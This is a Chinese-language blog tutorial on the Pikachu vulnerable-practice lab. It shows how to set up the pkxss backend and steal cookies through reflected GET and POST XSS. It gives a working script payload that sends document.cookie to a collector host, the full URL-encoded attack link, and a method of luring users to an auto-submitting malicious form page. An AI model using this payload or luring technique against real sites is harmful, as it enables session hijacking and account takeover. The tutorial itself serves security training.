pikachu--XSS(案例一:cookie的窃取和利用)

xss案例

  1. cookie的窃取和利用
  2. 钓鱼攻击
  3. Xss获取键盘记录

 

在进行案例之前首先要搭建xss后台

搭建xss后台

1.在pikachu文件夹下面,把pkxss单独放在www下面

 

 

2.修改配置文件  数据库服务器地址,账号,密码.

 

 

3.登录

 

 

4.安装

 

 

5.修改   重定向到一个可信的网站

 

 

 

 

 

案例一:

get型xss  cookie值获取

 修改输入长度

 

 

输入框输入

<script>document.location='http://192.168.27.156/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script>      提交

 

 

就会跳转到首页面

 

 

回到pxss那个界面  刷新  得到cookie值

 

 

其中referer

http://192.168.27.156/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.27.156%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit

用户一旦访问这个链接,它只会跳转到首页面,但是我们这样就已经获取到cookie值

 

 

post型xss  cookie值获取

 

 自己可以搭建一个站点,里面写入恶意的post表单,将这个链接(http://192.168.1.5/post.html)发送给用户,用户点击之后,后面就跟上一个一样了

 

 

首先登陆

 

查看pkxss-xcookie-post.html文件

 就是一旦加载页面,window.onload就会获取下面的表单,然后click就是点击提交,用户访问页面时候就会达到自动发送post请求的目的

 

用户访问欺骗的跳转页面(http://192.168.1.5/post.html),就会在pxss获取到cookie值

 

posted @ 2020-02-17 22:16  gxy*  阅读(1192)  评论(0编辑  收藏  举报